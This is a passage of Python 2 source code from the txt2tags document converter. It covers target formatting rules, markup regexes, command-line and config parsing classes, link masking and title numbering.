'tabletitlerowinbold', # manually bold any cell on table titles
'tablecellstrip', # strip extra spaces from each table cell
'barinsidequote', # bars are allowed inside quote blocks
'finalescapetitle', # perform final escapes on title lines
# target code beautify (ON/OFF)
'indentverbblock', # add leading spaces to verb block lines
'breaktablecell', # break lines after any table cell
'breaktablelineopen', # break line after opening table line
'notbreaklistopen', # don't break line after opening a new list
'notbreakparaopen', # don't break line after opening a new para
'keepquoteindent', # don't remove the leading TABs on quotes
'keeplistindent', # don't remove the leading spaces on lists
'blankendmotherlist', # append a blank line at the mother list end
'blankendtable', # append a blank line at the table end
'tagnotindentable', # tags must be placed at the line begining
# value settings
'listmaxdepth', # maximum depth for lists
'tablecellaligntype' # type of table cell align: cell, column
]
rules_bank = {
'txt' : {
'indentverbblock':1,
'spacedlistitem':1,
'parainsidelist':1,
'keeplistindent':1,
'barinsidequote':1,
'blankendmotherlist':1
},
'html': {
'indentverbblock':1,
'linkable':1,
'escapeurl':1,
'imglinkable':1,
'imgalignable':1,
'imgasdefterm':1,
'autonumberlist':1,
'spacedlistitem':1,
'parainsidelist':1,
'blankendmotherlist':1,
'tableable':1,
'tablecellstrip':1,
'blankendtable':1,
'breaktablecell':1,
'breaktablelineopen':1,
'keeplistindent':1,
'keepquoteindent':1,
'barinsidequote':1,
'tablecellaligntype':'cell'
},
#TIP xhtml inherits all HTML rules
'xhtml': {
},
'sgml': {
'linkable':1,
'escapeurl':1,
'autonumberlist':1,
'spacedlistitem':1,
'blankendmotherlist':1,
'tableable':1,
'tablecellstrip':1,
'blankendtable':1,
'quotenotnested':1,
'keeplistindent':1,
'keepquoteindent':1,
'barinsidequote':1,
'finalescapetitle':1,
'tablecellaligntype':'column'
},
'mgp' : {
'blankendmotherlist':1,
'tagnotindentable':1,
'spacedlistitem':1,
'imgalignable':1,
},
'tex' : {
'autonumberlist':1,
'autonumbertitle':1,
'spacedlistitem':1,
'blankendmotherlist':1,
'tableable':1,
'tablecellstrip':1,
'tabletitlerowinbold':1,
'blankendtable':1,
'verbblocknotescaped':1,
'keeplistindent':1,
'listmaxdepth':4,
'barinsidequote':1,
'finalescapetitle':1,
'tablecellaligntype':'column'
},
'moin': {
'spacedlistitem':1,
'linkable':1,
'blankendmotherlist':1,
'keeplistindent':1,
'tableable':1,
'barinsidequote':1,
'blankendtable':1,
'tabletitlerowinbold':1,
'tablecellstrip':1,
'tablecellaligntype':'cell'
},
'man' : {
'spacedlistitem':1,
'indentverbblock':1,
'blankendmotherlist':1,
'tagnotindentable':1,
'tableable':1,
'tablecellaligntype':'column',
'tabletitlerowinbold':1,
'tablecellstrip':1,
'blankendtable':1,
'keeplistindent':0,
'barinsidequote':1,
'parainsidelist':0,
},
'pm6' : {
'keeplistindent':1,
'verbblockfinalescape':1,
#TODO add support for these - maybe set a JOINNEXT char and
# do it on addLineBreaks()
'notbreaklistopen':1,
'notbreakparaopen':1,
'barinsidequote':1,
'onelinepara':1,
}
}
# get the target specific rules
if target == 'xhtml':
myrules = rules_bank['html'].copy() # inheritance
myrules.update(rules_bank['xhtml']) # get XHTML specific
else:
myrules = rules_bank[target].copy()
# populate return dictionary
for key in allrules: ret[key] = 0 # reset all
ret.update(myrules) # get rules
return ret
##############################################################################
def getRegexes():
"Returns all the regexes used to find the t2t marks"
bank = {
'blockVerbOpen':
re.compile(r'^```\s*$'),
'blockVerbClose':
re.compile(r'^```\s*$'),
'blockRawOpen':
re.compile(r'^"""\s*$'),
'blockRawClose':
re.compile(r'^"""\s*$'),
'quote':
re.compile(r'^\t+'),
'1lineVerb':
re.compile(r'^``` (?=.)'),
'1lineRaw':
re.compile(r'^""" (?=.)'),
# mono, raw, bold, italic, underline:
# - marks must be glued with the contents, no boundary spaces
# - they are greedy, so in ****bold****, turns to <b>**bold**</b>
'fontMono':
re.compile( r'``([^\s](|.*?[^\s])`*)``'),
'raw':
re.compile( r'""([^\s](|.*?[^\s])"*)""'),
'fontBold':
re.compile(r'\*\*([^\s](|.*?[^\s])\**)\*\*'),
'fontItalic':
re.compile( r'//([^\s](|.*?[^\s])/*)//'),
'fontUnderline':
re.compile( r'__([^\s](|.*?[^\s])_*)__'),
'list':
re.compile(r'^( *)(-) (?=[^ ])'),
'numlist':
re.compile(r'^( *)(\+) (?=[^ ])'),
'deflist':
re.compile(r'^( *)(:) (.*)$'),
'bar':
re.compile(r'^(\s*)([_=-]{20,})\s*$'),
'table':
re.compile(r'^ *\|\|? '),
'blankline':
re.compile(r'^\s*$'),
'comment':
re.compile(r'^%'),
# auxiliar tag regexes
'_imgAlign' : re.compile(r'~A~',re.I),
'_tableAlign' : re.compile(r'~A~',re.I),
'_anchor' : re.compile(r'~A~',re.I),
'_tableBorder' : re.compile(r'~B~',re.I),
'_tableColAlign': re.compile(r'~C~',re.I),
}
# special char to place data on TAGs contents (\a == bell)
bank['x'] = re.compile('\a')
# %%date [ (formatting) ]
bank['date'] = re.compile(r'%%date\b(\((?P<fmt>.*?)\))?', re.I)
# almost complicated title regexes ;)
titskel = r'^ *(?P<id>%s)(?P<txt>%s)\1(\[(?P<label>\w*)\])?\s*$'
bank[ 'title'] = re.compile(titskel%('[=]{1,5}','[^=](|.*[^=])'))
bank['numtitle'] = re.compile(titskel%('[+]{1,5}','[^+](|.*[^+])'))
### complicated regexes begin here ;)
#
# textual descriptions on --help's style: [...] is optional, | is OR
### first, some auxiliar variables
#
# [image.EXT]
patt_img = r'\[([\w_,.+%$#@!?+~/-]+\.(png|jpe?g|gif|eps|bmp))\]'
# link things
urlskel = {
'proto' : r'(https?|ftp|news|telnet|gopher|wais)://',
'guess' : r'(www[23]?|ftp)\.', # w/out proto, try to guess
'login' : r'A-Za-z0-9_.-', # for ftp://login@domain.com
'pass' : r'[^ @]*', # for ftp://login:password@dom.com
'chars' : r'A-Za-z0-9%._/~:,=$@&-',# %20(space), :80(port), D&D
'anchor': r'A-Za-z0-9%._-', # %nn(encoded)
'form' : r'A-Za-z0-9/%&=+.,@*_-', # .,@*_-(as is)
'punct' : r'.,;:!?'
}
# username [ :password ] @
patt_url_login = r'([%s]+(:%s)?@)?'%(urlskel['login'],urlskel['pass'])
# [ http:// ] [ username:password@ ] domain.com [ / ]
# [ #anchor | ?form=data ]
retxt_url = r'\b(%s%s|%s)[%s]+\b/*(\?[%s]+)?(#[%s]+)?'%(
urlskel['proto'],patt_url_login, urlskel['guess'],
urlskel['chars'],urlskel['form'],urlskel['anchor'])
# filename | [ filename ] #anchor
retxt_url_local = r'[%s]+|[%s]*(#[%s]+)'%(
urlskel['chars'],urlskel['chars'],urlskel['anchor'])
# user@domain [ ?form=data ]
patt_email = r'\b[%s]+@([A-Za-z0-9_-]+\.)+[A-Za-z]{2,4}\b(\?[%s]+)?'%(
urlskel['login'],urlskel['form'])
# saving for future use
bank['_urlskel'] = urlskel
### and now the real regexes
#
bank['email'] = re.compile(patt_email,re.I)
# email | url
bank['link'] = re.compile(r'%s|%s'%(retxt_url,patt_email), re.I)
# \[ label | imagetag url | email | filename \]
bank['linkmark'] = re.compile(
r'\[(?P<label>%s|[^]]+) (?P<link>%s|%s|%s)\]'%(
patt_img, retxt_url, patt_email, retxt_url_local),
re.L+re.I)
# image
bank['img'] = re.compile(patt_img, re.L+re.I)
# all macros
bank['macro'] = bank['date']
# special things
bank['special'] = re.compile(r'^%!\s*')
return bank
### END OF regex nightmares
##############################################################################
def echo(msg): # for quick debug
print '\033[32;1m%s\033[m'%msg
def Quit(msg, exitcode=0):
print msg
sys.exit(exitcode)
def Error(msg):
sys.stderr.write(_("%s: Error: ")%my_name + "%s\n"%msg)
sys.stderr.flush()
sys.exit(1)
def ShowTraceback():
try:
from traceback import print_exc
print_exc() ; print ; print
except: pass
def Message(msg,level):
if level <= VERBOSE:
prefix = '-'*5
print "%s %s"%(prefix*level, msg)
def Debug(msg,color=0,linenr=None):
"0gray=init,1red=conf,3yellow=line,6cyan=block,2green=detail,5pink=gui"
if not DEBUG: return
if COLOR_DEBUG: msg = '\033[3%s;1m%s\033[m'%(color,msg)
if linenr is not None: msg = "LINE %04d: %s"%(linenr,msg)
print "** %s"%msg
def Readfile(file, remove_linebreaks=0):
if file == '-':
try: data = sys.stdin.readlines()
except: Error(_('You must feed me with data on STDIN!'))
else:
try: f = open(file); data = f.readlines() ; f.close()
except: Error(_("Cannot read file:")+"\n %s"%file)
if remove_linebreaks:
data = map(lambda x:re.sub('[\n\r]+$','',x), data)
Message(_("Readed file (%d lines): %s")%(len(data),file),2)
return data
def Savefile(file, contents):
try: f = open(file, 'wb')
except: Error(_("Cannot open file for writing:")+"\n %s"%file)
if type(contents) == type([]): doit = f.writelines
else: doit = f.write
doit(contents) ; f.close()
def showdic(dic):
for k in dic.keys(): print "%15s : %s" % (k,dic[k])
def dotted_spaces(txt=''):
return string.replace(txt,' ','.')
def get_rc_path():
rc_file = RC
# try to get rc dir name (usually $HOME on win and linux)
rc_dir = os.environ.get('HOME')
if rc_dir:
# compose path and return it if the file exists
rc_path = os.path.join(rc_dir, rc_file)
if os.path.isfile(rc_path):
return rc_path
return ''
##############################################################################
class CommandLine:
"""Command Line class - Masters command line
This class checks and extract data from the provided command line.
The --long options and flags are taken from the global OPTIONS,
FLAGS and ACTIONS dictionaries. The short options are registered
here, and also their equivalence to the long ones.
METHODS:
_compose_short_opts() -> str
_compose_long_opts() -> list
Compose the valid short and long options list, on the
'getopt' format.
parse() -> (opts, args)
Call getopt to check and parse the command line.
It expects to receive the command line as a list, and
without the program name (sys.argv[1:]).
get_raw_config() -> [RAW config]
Scans command line and convert the data to the RAW config
format. See ConfigMaster class to the RAW format description.
Optional 'ignore' and 'filter' arguments are used to filter
in or out specified keys.
compose_cmdline(dict) -> [Command line]
Compose a command line list from an already parsed config
dictionary, generated from RAW by ConfigMaster(). Use
this to compose an optimal command line for a group of
options.
The get_raw_config() calls parse(), so the tipical use of this
class is:
raw = CommandLine().get_raw_config(sys.argv[1:])
"""
def __init__(self):
self.all_options = OPTIONS.keys()
self.all_flags = FLAGS.keys()
self.all_actions = ACTIONS.keys()
# short:long options equivalence
self.short_long = {
'h':'help' , 'V':'version',
'n':'enum-title', 'i':'infile' ,
'H':'no-headers', 'o':'outfile',
'v':'verbose' , 't':'target'
}
# compose valid short and long options data for getopt
self.short_opts = self._compose_short_opts()
self.long_opts = self._compose_long_opts()
def _compose_short_opts(self):
"Returns a string like 'hVt:o' with all short options/flags"
ret = []
for opt in self.short_long.keys():
long = self.short_long[opt]
if long in self.all_options: # is flag or option?
opt = opt+':' # option: have param
ret.append(opt)
Debug('Valid SHORT options: %s'%ret)
return string.join(ret, '')
def _compose_long_opts(self):
"Returns a list with all the valid long options/flags"
ret = map(lambda x:x+'=', self.all_options) # add =
ret.extend(self.all_flags) # flag ON
ret.extend(self.all_actions) # acts
ret.extend(map(lambda x:'no-'+x, self.all_flags)) # add no-*
ret.extend(['no-style']) # turn OFF option
ret.extend(['no-encoding']) # turn OFF option
ret.extend(['no-outfile']) # turn OFF option
Debug('Valid LONG options: %s'%ret)
return ret
def _tokenize(self, cmd_string=''):
"Convert a command line string to a list"
#TODO protect quotes contents
return string.split(cmd_string)
def parse(self, cmdline=[]):
"Check/Parse a command line list TIP: no program name!"
# get the valid options
short, long = self.short_opts, self.long_opts
# parse it!
try:
opts, args = getopt.getopt(cmdline, short, long)
except getopt.error, errmsg:
Error(_("%s (try --help)")%errmsg)
return (opts, args)
def get_raw_config(self, cmdline=[], ignore=[], filter=[]):
"Returns the options/arguments found as RAW config"
if not cmdline: return []
ret = []
# we need lists, not strings
if type(cmdline) == type(''): cmdline = self._tokenize(cmdline)
Debug("cmdline: %s"%cmdline)
opts, args = self.parse(cmdline[:])
# get infile, if any
while args:
infile = args.pop(0)
ret.append(['infile', infile])
# parse all options
for name,value in opts:
# remove leading - and --
name = re.sub('^--?', '', name)
# translate short opt to long
if len(name) == 1: name = self.short_long.get(name)
# save it (if allowed)
ret.append([name, value])
# apply 'ignore' and 'filter' rules (filter is stronger)
temp = ret[:] ; ret = []
for name,value in temp:
if (not filter and not ignore) or \
(filter and name in filter) or \
(ignore and name not in ignore):
ret.append( ['all', name, value] )
# add the original command line string as 'realcmdline'
ret.append( ['all', 'realcmdline', cmdline] )
return ret
def compose_cmdline(self, conf={}, no_check=0):
"compose a full (and diet) command line from CONF dict"
if not conf: return []
args = []
dft_options = OPTIONS.copy()
cfg = conf.copy()
valid_opts = self.all_options + self.all_flags
use_short = {'no-headers':'H', 'enum-title':'n'}
# remove useless options
if not no_check and cfg.get('toc-only'):
if cfg.has_key('no-headers'):
del cfg['no-headers']
if cfg.has_key('outfile'):
del cfg['outfile'] # defaults to STDOUT
if cfg.get('target') == 'txt':
del cfg['target'] # already default
args.append('--toc-only') # must be the first
del cfg['toc-only']
# add target type
if cfg.has_key('target'):
args.append('-t '+cfg['target'])
del cfg['target']
# add other options
for key in cfg.keys():
if key not in valid_opts: continue # may be a %!setting
if key in ['outfile','infile']: continue # later
val = cfg[key]
if not val: continue
# default values are useless on cmdline
if val == dft_options.get(key): continue
# -short format
if key in use_short.keys():
args.append('-'+use_short[key])
continue
# --long format
if key in self.all_flags: # add --option
args.append('--'+key)
else: # add --option=value
args.append('--%s=%s'%(key,val))
# the outfile using -o
if cfg.has_key('outfile') and \
cfg['outfile'] != dft_options.get('outfile'):
args.append('-o '+cfg['outfile'])
# place input file(s) always at the end
if cfg.has_key('infile'):
args.append(string.join(cfg['infile'],' '))
# return as a nice list
Debug("Diet command line: %s"%string.join(args,' '), 1)
return args
##############################################################################
class SourceDocument:
"""
SourceDocument class - scan document structure, extract data
It knows about full files. It reads a file and identify all
the areas begining (Head,Conf,Body). With this info it can
extract each area contents.
Note: the original line break is removed.
DATA:
self.arearef - Save Head, Conf, Body init line number
self.areas - Store the area names which are not empty
self.buffer - The full file contents (with NO \\r, \\n)
METHODS:
get() - Access the contents of an Area. Example:
config = SourceDocument(file).get('conf')
split() - Get all the document Areas at once. Example:
head, conf, body = SourceDocument(file).split()
RULES:
* The document parts are sequential: Head, Conf and Body.
* One ends when the next begins.
* The Conf Area is optional, so a document can have just
Head and Body Areas.
These are the Areas limits:
- Head Area: the first three lines
- Body Area: from the first valid text line to the end
- Conf Area: the comments between Head and Body Areas
Exception: If the first line is blank, this means no
header info, so the Head Area is just the first line.
"""
def __init__(self, filename=''):
self.areas = ['head','conf','body']
self.arearef = []
self.areas_fancy = ''
self.filename = filename
self.buffer = []
if filename: self.scan(filename)
def split(self):
"Returns all document parts, splitted into lists."
return self.get('head'), self.get('conf'), self.get('body')
def get(self, areaname):
"Returns head|conf|body contents from self.buffer"
# sanity
if areaname not in self.areas: return []
if not self.buffer : return []
# go get it
bufini = 1
bufend = len(self.buffer)
if areaname == 'head':
ini = bufini
end = self.arearef[1] or self.arearef[2] or bufend
elif areaname == 'conf':
ini = self.arearef[1]
end = self.arearef[2] or bufend
elif areaname == 'body':
ini = self.arearef[2]
end = bufend
else:
Error("Unknown Area name '%s'"%areaname)
lines = self.buffer[ini:end]
# make sure head will always have 3 lines
while areaname == 'head' and len(lines) < 3:
lines.append('')
return lines
def scan(self, filename):
"Run through source file and identify head/conf/body areas"
Debug("source file: %s"%filename)
Message(_("Loading source document"),1)
buf = Readfile(filename, remove_linebreaks=1)
cfg_parser = ConfigLines().parse_line
buf.insert(0, '') # text start at pos 1
ref = [1,4,0]
if not string.strip(buf[1]): # no header
ref[0] = 0 ; ref[1] = 2
for i in range(ref[1],len(buf)): # find body init:
if string.strip(buf[i]) and ( # ... not blank and
buf[i][0] != '%' or # ... not comment or
cfg_parser(buf[i],'include')[1]): # ... %!include
ref[2] = i ; break
if ref[1] == ref[2]: ref[1] = 0 # no conf area
for i in 0,1,2: # del !existent
if ref[i] >= len(buf): ref[i] = 0 # title-only
if not ref[i]: self.areas[i] = ''
Debug('Head,Conf,Body start line: %s'%ref)
self.arearef = ref # save results
self.buffer = buf
# fancyness sample: head conf body (1 4 8)
self.areas_fancy = "%s (%s)"%(
string.join(self.areas),
string.join(map(str, map(lambda x:x or '', ref))))
Message(_("Areas found: %s")%self.areas_fancy, 2)
def get_raw_config(self):
"Handy method to get the CONF area RAW config (if any)"
if not self.areas.count('conf'): return []
Message(_("Scanning source document CONF area"),1)
raw = ConfigLines(
file=self.filename, lines=self.get('conf'),
first_line=self.arearef[1]).get_raw_config()
Debug("document raw config: %s"%raw, 1)
return raw
##############################################################################
class ConfigMaster:
"""ConfigMaster class - the configuration wizard
This class is the configuration master. It knows how to handle
the RAW and PARSED config format. It also performs the sanity
checkings for a given configuration.
DATA:
self.raw - Stores the config on the RAW format
self.parsed - Stores the config on the PARSED format
self.defaults - Stores the default values for all keys
self.off - Stores the OFF values for all keys
self.multi - List of keys which can have multiple values
self.numeric - List of keys which value must be a number
self.incremental - List of keys which are incremental
RAW FORMAT:
The RAW format is a list of lists, being each mother list item
a full configuration entry. Any entry is a 3 item list, on
the following format: [ TARGET, KEY, VALUE ]
Being a list, the order is preserved, so it's easy to use
different kinds of configs, as CONF area and command line,
respecting the precedence.
The special target 'all' is used when no specific target was
defined on the original config.
PARSED FORMAT:
The PARSED format is a dictionary, with all the 'key : value'
found by reading the RAW config. The self.target contents
matters, so this dictionary only contains the target's
config. The configs of other targets are ignored.
The CommandLine and ConfigLines classes have the get_raw_config()
method which convert the configuration found to the RAW format.
Just feed it to parse() and get a brand-new ready-to-use config
dictionary. Example:
>>> raw = CommandLine().get_raw_config(['-n', '-H'])
>>> print raw
[['all', 'enum-title', ''], ['all', 'no-headers', '']]
>>> parsed = ConfigMaster(raw).parse()
>>> print parsed
{'enum-title': 1, 'headers': 0}
"""
def __init__(self, raw=[], target=''):
self.raw = raw
self.target = target
self.parsed = {}
self.dft_options = OPTIONS.copy()
self.dft_flags = FLAGS.copy()
self.dft_actions = ACTIONS.copy()
self.dft_settings = SETTINGS.copy()
self.defaults = self._get_defaults()
self.off = self._get_off()
self.multi = ['infile', 'options','preproc','postproc']
self.incremental = ['verbose']
self.numeric = ['toc-level','split']
def _get_defaults(self):
"Get the default values for all config/options/flags"
empty = {}
for kw in CONFIG_KEYWORDS: empty[kw] = ''
empty.update(self.dft_options)
empty.update(self.dft_flags)
empty.update(self.dft_actions)
empty.update(self.dft_settings)
empty['realcmdline'] = '' # internal use only
empty['sourcefile'] = '' # internal use only
return empty
def _get_off(self):
"Turns OFF all the config/options/flags"
off = {}
for key in self.defaults.keys():
kind = type(self.defaults[key])
if kind == type(9):
off[key] = 0
elif kind == type(''):
off[key] = ''
elif kind == type([]):
off[key] = []
else:
Error('ConfigMaster: %s: Unknown type'+key)
return off
def _check_target(self):
"Checks if the target is already defined. If not, do it"
if not self.target:
self.target = self.find_value('target')
def get_target_raw(self):
"Returns the raw config for self.target or 'all'"
ret = []
self._check_target()
for entry in self.raw:
if entry[0] in [self.target, 'all']:
ret.append(entry)
return ret
def add(self, key, val):
"Adds the key:value pair to the config dictionary (if needed)"
# %!options
if key == 'options':
ignoreme = self.dft_actions.keys() + ['target']
raw_opts = CommandLine().get_raw_config(
val, ignore=ignoreme)
for target, key, val in raw_opts:
self.add(key, val)
return
# the no- prefix turns OFF this key
if key[:3] == 'no-':
key = key[3:] # remove prefix
val = self.off.get(key) # turn key OFF
# is this key valid?
if key not in self.defaults.keys():
Debug('Bogus Config %s:%s'%(key,val),1)
return
# is this value the default one?
if val == self.defaults.get(key):
# if default value, remove previous key:val
if self.parsed.has_key(key):
del self.parsed[key]
# nothing more to do
return
# flags ON comes empty. we'll add the 1 value now
if val == '' and \
key in self.dft_flags.keys()+self.dft_actions.keys():
val = 1
# multi value or single?
if key in self.multi:
# first one? start new list
if not self.parsed.has_key(key):
self.parsed[key] = []
self.parsed[key].append(val)
# incremental value? so let's add it
elif key in self.incremental:
self.parsed[key] = (self.parsed.get(key) or 0) + val
else:
self.parsed[key] = val
fancykey = dotted_spaces("%12s"%key)
Message(_("Added config %s : %s")%(fancykey,val),3)
def get_outfile_name(self, config={}):
"Dirname is the same for {in,out}file"
infile, outfile = config['sourcefile'], config['outfile']
if infile == STDIN and not outfile: outfile = STDOUT
if not outfile and (infile and config.get('target')):
basename = re.sub('\.(txt|t2t)$','',infile)
outfile = "%s.%s"%(basename, config['target'])
Debug(" infile: '%s'"%infile , 1)
Debug("outfile: '%s'"%outfile, 1)
return outfile
def sanity(self, config, gui=0):
"Basic config sanity checkings"
if not config: return {}
target = config.get('target')
# --toc-only doesn't require target specification
if not target and config.get('toc-only'):
target = 'txt'
# on GUI, some checkings are skipped
if not gui:
# we *need* a target
if not target:
Error(_('No target specified (try --help)')+\
'\n\n'+\
_('Maybe trying to convert an old v1.x file?'))
# and of course, an infile also
if not config['infile']:
Error(_('Missing input file (try --help)'))
# is the target valid?
if not TARGETS.count(target):
Error(_("Invalid target '%s' (try --help)"
)%target)
# ensure all keys are present
empty = self.defaults.copy() ; empty.update(config)
config = empty.copy()
# check integers options
for key in config.keys():
if key in self.numeric:
try: config[key] = int(config[key])
except: Error(_('--%s value must be a number'
)%key)
# check split level value
if config['split'] not in [0,1,2]:
Error(_('Option --split must be 0, 1 or 2'))
# --toc-only is stronger than others
if config['toc-only']:
config['headers'] = 0
config['toc'] = 0
config['split'] = 0
config['gui'] = 0
config['outfile'] = STDOUT
# splitting is disable for now (future: HTML only, no STDOUT)
config['split'] = 0
# restore target
config['target'] = target
# set output file name
config['outfile'] = self.get_outfile_name(config)
# checking suicide
if config['sourcefile'] == config['outfile'] and \
config['outfile'] != STDOUT and not gui:
Error(_("Input and Output files are the same: %s")%(
config['outfile']))
return config
def parse(self):
"Returns the parsed config for the current target"
raw = self.get_target_raw()
for target, key, value in raw:
self.add(key, value)
Message(_("Added the following keys: %s")%string.join(
self.parsed.keys(),', '),2)
return self.parsed.copy()
def find_value(self, key='', target=''):
"Scans ALL raw config to find the desired key"
ret = []
# scan and save all values found
for targ, k, val in self.raw:
if targ in [target, 'all'] and k == key:
ret.append(val)
if not ret: return ''
# if not multi value, return only the last found
if key in self.multi: return ret
else : return ret[-1]
########################################################################
class ConfigLines:
"""ConfigLines class - the config file data extractor
This class reads and parse the config lines on the %!key:val
format, converting it to RAW config. It deals with user
config file (RC file), source document CONF area and
%!includeconf directives.
Call it passing a file name or feed the desired config lines.
Then just call the get_raw_config() method and wait to
receive the full config data on the RAW format. This method
also follows the possible %!includeconf directives found on
the config lines. Example:
raw = ConfigLines(file=".txt2tagsrc").get_raw_config()
The parse_line() method is also useful to be used alone,
to identify and tokenize a single config line. For example,
to get the %!include command components, on the source
document BODY:
target, key, value = ConfigLines().parse_line(body_line)
"""
def __init__(self, file='', lines=[], first_line=1):
self.file = file or 'NOFILE'
self.lines = lines
self.first_line = first_line
def load_lines(self):
"Make sure we've loaded the file contents into buffer"
if not self.lines and not self.file:
Error("ConfigLines: No file or lines provided")
if not self.lines:
self.lines = self.read_config_file(self.file)
def read_config_file(self, filename=''):
"Read a Config File contents, aborting on invalid line"
if not filename: return []
errormsg = _("Invalid CONFIG line on %s")+"\n%03d:%s"
lines = Readfile(filename, remove_linebreaks=1)
# sanity: try to find invalid config lines
for i in range(len(lines)):
line = string.rstrip(lines[i])
if not line: continue # empty
if line[0] != '%': Error(errormsg%(filename,i+1,line))
return lines
def include_config_file(self, file=''):
"Perform the %!includeconf action, returning RAW config"
if not file: return []
# current dir relative to the current file (self.file)
current_dir = os.path.dirname(self.file)
file = os.path.join(current_dir, file)
# read and parse included config file contents
lines = self.read_config_file(file)
return ConfigLines(file=file, lines=lines).get_raw_config()
def get_raw_config(self):
"Scan buffer and extract all config as RAW (including includes)"
ret = []
self.load_lines()
first = self.first_line
for i in range(len(self.lines)):
line = self.lines[i]
Message(_("Processing line %03d: %s")%(first+i,line),2)
target, key, val = self.parse_line(line)
if not key: continue # no config on this line
if key == 'includeconf':
more_raw = self.include_config_file(val)
ret.extend(more_raw)
Message(_("Finished Config file inclusion: %s"
)%(val),2)
else:
ret.append([target, key, val])
Message(_("Added %s")%key,3)
return ret
def parse_line(self, line='', keyname='', target=''):
"Detects %!key:val config lines and extract data from it"
empty = ['', '', '']
if not line: return empty
no_target = ['target', 'includeconf']
re_name = keyname or '[a-z]+'
re_target = target or '[a-z]*'
cfgregex = re.compile("""
^%%!\s* # leading id with opt spaces
(?P<name>%s)\s* # config name
(\((?P<target>%s)\))? # optional target spec inside ()
\s*:\s* # key:value delimiter with opt spaces
(?P<value>\S.+?) # config value
\s*$ # rstrip() spaces and hit EOL
"""%(re_name,re_target), re.I+re.VERBOSE)
prepostregex = re.compile("""
# ---[ PATTERN ]---
^( "([^"]*)" # "double quoted" or
| '([^']*)' # 'single quoted' or
| ([^\s]+) # single_word
)
\s+ # separated by spaces
# ---[ REPLACE ]---
( "([^"]*)" # "double quoted" or
| '([^']*)' # 'single quoted' or
| (.*) # anything
)
\s*$
""", re.VERBOSE)
guicolors = re.compile("^([^\s]+\s+){3}[^\s]+") # 4 tokens
match = cfgregex.match(line)
if not match: return empty
name = string.lower(match.group('name') or '')
target = string.lower(match.group('target') or 'all')
value = match.group('value')
# NO target keywords: force all targets
if name in no_target: target = 'all'
# special config for GUI colors
if name == 'guicolors':
valmatch = guicolors.search(value)
if not valmatch: return empty
value = re.split('\s+', value)
# Special config with two quoted values (%!preproc: "foo" 'bar')
if name in ['preproc','postproc']:
valmatch = prepostregex.search(value)
if not valmatch: return empty
getval = valmatch.group
patt = getval(2) or getval(3) or getval(4) or ''
repl = getval(6) or getval(7) or getval(8) or ''
value = (patt, repl)
return [target, name, value]
##############################################################################
class MaskMaster:
"(Un)Protect important structures from escaping and formatting"
def __init__(self):
self.linkmask = '@@_link_@@'
self.monomask = '@@_mono_@@'
self.macromask = '@@_macro_@@'
self.rawmask = '@@_raw_@@'
self.reset()
def reset(self):
self.linkbank = []
self.monobank = []
self.macrobank = []
self.rawbank = []
def mask(self, line=''):
# protect raw text
while regex['raw'].search(line):
txt = regex['raw'].search(line).group(1)
txt = doEscape(TARGET,txt)
self.rawbank.append(txt)
line = regex['raw'].sub(self.rawmask,line,1)
# protect pre-formatted font text
while regex['fontMono'].search(line):
txt = regex['fontMono'].search(line).group(1)
txt = doEscape(TARGET,txt)
self.monobank.append(txt)
line = regex['fontMono'].sub(self.monomask,line,1)
# protect macros
while regex['macro'].search(line):
txt = regex['macro'].search(line).group()
self.macrobank.append(txt)
line = regex['macro'].sub(self.macromask,line,1)
# protect URLs and emails
while regex['linkmark'].search(line) or \
regex['link' ].search(line):
# try to match plain or named links
match_link = regex['link'].search(line)
match_named = regex['linkmark'].search(line)
# define the current match
if match_link and match_named:
# both types found, which is the first?
m = match_link
if match_named.start() < match_link.start():
m = match_named
else:
# just one type found, we're fine
m = match_link or match_named
# extract link data and apply mask
if m == match_link: # plain link
link = m.group()
label = ''
link_re = regex['link']
else: # named link
link = m.group('link')
label = string.rstrip(m.group('label'))
link_re = regex['linkmark']
line = link_re.sub(self.linkmask,line,1)
# save link data to the link bank
self.linkbank.append((label, link))
return line
def undo(self, line):
# url & email
for label,url in self.linkbank:
link = get_tagged_link(label, url)
line = string.replace(line, self.linkmask, link, 1)
# expand macros
for macro in self.macrobank:
line = string.replace(line, self.macromask, macro,1)
if self.macrobank:
line = doDateMacro(line)
# expand verb
for mono in self.monobank:
open,close = TAGS['fontMonoOpen'],TAGS['fontMonoClose']
tagged = open+mono+close
line = string.replace(line,self.monomask,tagged,1)
# expand raw
for raw in self.rawbank:
line = string.replace(line,self.rawmask,raw,1)
return line
##############################################################################
class TitleMaster:
"Title things"
def __init__(self):
self.count = ['',0,0,0,0,0]
self.toc = []
self.level = 0
self.kind = ''
self.txt = ''
self.label = ''
self.tag = ''
self.count_id = ''
self.user_labels = {}
self.anchor_count = 0
self.anchor_prefix = 'toc'
def add(self, line):
"Parses a new title line."
if not line: return
self._set_prop(line)
self._set_count_id()
self._set_label()
self._save_toc_info()
def _save_toc_info(self):
"Save TOC info, used by self.dump_marked_toc()"
self.toc.append((self.level, self.count_id,
self.txt , self.label ))
def _set_prop(self, line=''):
"Extract info from original line and set data holders."
# detect title type (numbered or not)
id = string.lstrip(line)[0]
if id == '=': kind = 'title'
elif id == '+': kind = 'numtitle'
else: Error("Unknown Title ID '%s'"%id)
# extract line info
match = regex[kind].search(line)
level = len(match.group('id'))
txt = string.strip(match.group('txt'))
label = match.group('label')
# parse info & save
if CONF['enum-title']: kind = 'numtitle' # force
self.tag = TAGS[kind+`level`] or TAGS['title'+`level`]
self.kind = kind
self.level = level
self.txt = txt
self.label = label
def _set_count_id(self):
"Compose and save the title count identifier (if needed)."
count_id = ''
if self.kind == 'numtitle' and not rules['autonumbertitle']:
# manually increase title count
self.count[self.level] = self.count[self.level] +1
# reset sublevels count (if any)
max_levels = len(self.count)
if self.level < max_levels-1:
for i in range(self.level+1, max_levels):
self.count[i] = 0
# compose count id from hierarchy
for i in range(self.level):
count_id= "%s%d."%(count_id, self.count[i+1])
self.count_id = count_id
def _set_label(self):
"Compose and save title label, used by anchors."
# remove invalid chars from label set by user
self.label = re.sub('[^A-Za-z0-9_]', '', self.label or '')
# generate name as 15 first :alnum: chars
#TODO how to translate safely accented chars to plain?
#self.label = re.sub('[^A-Za-z0-9]', '', self.txt)[:15]
# 'tocN' label - sequential count, ignoring 'toc-level'
#self.label = self.anchor_prefix + str(len(self.toc)+1)
def _get_tagged_anchor(self):
"Return anchor if user defined a label, or TOC is on."
ret = ''
label = self.label
if CONF['toc'] and self.level <= CONF['toc-level']:
# this count is needed bcos self.toc stores all
# titles, regardless of the 'toc-level' setting,
# so we can't use self.toc lenght to number anchors
self.anchor_count = self.anchor_count + 1
# autonumber label (if needed)
label = label or '%s%s'%(
self.anchor_prefix, self.anchor_count)
